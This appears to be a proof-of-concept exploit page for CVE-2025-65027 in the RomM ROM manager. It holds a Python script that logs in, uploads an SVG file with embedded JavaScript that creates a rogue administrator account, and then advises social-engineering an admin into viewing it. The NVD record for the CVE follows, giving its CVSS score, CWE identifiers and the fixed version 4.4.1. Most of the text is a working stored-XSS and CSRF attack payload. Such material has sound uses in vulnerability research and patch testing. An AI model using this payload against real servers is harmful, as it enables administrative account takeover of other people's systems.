CVE-2025-65027

import requests import json # CVE-2025-65027 PoC - Malicious SVG file upload for Stored XSS # Target: RomM < 4.4.1 TARGET_URL = "http://target-romm-server.com" USERNAME = "attacker" PASSWORD = "password123" # Step 1: Login to get authentication token def login(): session = requests.Session() login_url = f"{TARGET_URL}/api/auth/login" data = {"username": USERNAME, "password": PASSWORD} resp = session.post(login_url, json=data) return session, resp.json().get("access_token") # Step 2: Upload malicious SVG file with XSS payload def upload_malicious_svg(session, token): upload_url = f"{TARGET_URL}/api/upload" headers = {"Authorization": f"Bearer {token}"} # Malicious SVG with XSS payload malicious_svg = '''<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg"> <script><![CDATA[ // Steal admin session and create rogue admin fetch('/api/admin/users', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ username: 'rogue_admin', password: 'P@ssw0rd123!', role: 'admin' }) }); ]]></script> <rect width="100" height="100" fill="red"/> </svg>''' files = {'file': ('malicious.svg', malicious_svg, 'image/svg+xml')} resp = session.post(upload_url, headers=headers, files=files) return resp.json() # Step 3: Trigger XSS by accessing the uploaded file def trigger_xss(session, file_path): access_url = f"{TARGET_URL}{file_path}" session.get(access_url) return True if __name__ == "__main__": print("CVE-2025-65027 PoC - RomM Unrestricted File Upload leading to Stored XSS") session, token = login() if token: print(f"[+] Login successful, token obtained") result = upload_malicious_svg(session, token) print(f"[+] Malicious SVG uploaded: {result}") # In real attack, social engineer admin to access the file print("[*] Wait for admin to access the file to trigger XSS")

{"cve": {"id": "CVE-2025-65027", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:25.913", "lastModified": "2026-02-24T20:04:06.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RomM (ROM Manager) allows users to scan, enrich, browse and play their game collections with a clean and responsive interface. RomM contains multiple unrestricted file upload vulnerabilities that allow authenticated users to upload malicious SVG or HTML files. When these files are accessed the browser executes embedded JavaScript, leading to stored Cross-Site Scripting (XSS) which when combined with a CSRF misconfiguration they lead to achieve full administrative account takeover, creating a rogue admin account, escalating the attacker account role to admin, and much more. This vulnerability is fixed in 4.4.1 and 4.4.1-beta.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-352"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:romm.app:romm:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.1", "matchCriteriaId": "3501BC54-F9F3-4C68-AD5E-142908B2948C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:romm.app:romm:4.4.1:beta1:*:*:*:*:*:*", "matchCriteriaId": "93D1318D-39AA-4BCF-BACF-A869B8444BAE"}]}]}], "references": [{"url": "https://github.com/rommapp/romm/security/advisories/GHSA-v3c6-w996-f7hx", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}